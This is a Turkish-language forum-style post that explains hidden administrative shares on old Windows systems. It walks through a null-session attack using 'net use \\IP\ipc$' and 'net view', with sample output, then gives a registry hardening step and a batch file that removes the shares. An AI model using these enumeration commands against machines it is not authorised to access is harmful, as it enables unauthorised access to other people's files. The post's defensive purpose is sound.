Pc nizdeki gizli paylasimlari bulun:
baslat - calistir - cmd acilan ekrana net share yazin ve enter yapin
komutunu verdiginizde eger ekraninizda sonu $ isaretli sürücü veya
herhangi birseyler cikiyorsa iste bunlar xp ,2000 veya Nt sistemlerinin
gizli paylasima acik dosya,dizin... leridir. Evet sok olunacak bir sey
ama gercek.(Güvenli Pc niz elek gibiymis degilmi) simdi cok basitce bir
hackerin kendi dos ekrani ile nasil sizin sisteminize saldiracagini
görelim:
1.Baslat-calistir-cmd C:\>net view \\24.**.52.** (yani ip nosu)
System error 5 has occurred. Access is denied. Üstte görüldügü gibi
hackerimizin paylasim listenizi görmek icin yazdigi ilk komut tutmadi
(%99)
2. C:\>net use \\24.**.52.**\ipc$ /u:"" "" The command completed
successfully. Bu üstteki komut ile Hacker sisteminize bir null session
kurdu
3. C:\>net view \\24.**.52.** Shared resources at \\24.**.52.**
AteTrack Share name Type Used as Comment
-------------------------------------- Games Disk My Documents Disk
Share Disk Susie Print Canon BJ-100 The command completed successfully.
Görüldügü üzere 3. dos komutuyla Hackerimiz emeline ulasti (Tüm
paylasimlar artik emrinde) Bu son derece basit bir atak fakat bir okadar
da tehlikeli.
Önlemler:
1.HKEY_LOCAL_MACHINE\System\CurrentControlSet\Cont rol\Lsa
restrictanonymous u 0 dan 1. e degistirin paylasim listesini görebilmek
icin Hackerimizin bir login name ve passwort girmesi gerekecek
2.peki bu $ li paylasimlari nasil kaldiracagiz=?
----------------------
@echo off
net share c$ /d
net share d$ /d
net share f$ /d
net share g$ /d
net share h$ /d
net share e$ /d
net share admin$ /d
net share IPC$ /d
---------------------
üsttekini copy paste ile not defterinize yapistirin ve uzantisi bat
olacak sekilde kaydedin ve clickleyerek calistirin. sonra tekrar baslat -
calistir - cmd - net share komutunu verin bakalim elegin delikleri
kapanmismi Tarafimdan denedi ve sadece net share IPC$ Gizli paylasima
kapatilamadi
Notu üstteki islem her acilista tekrarlanmalidir yada Xpspeed kullanin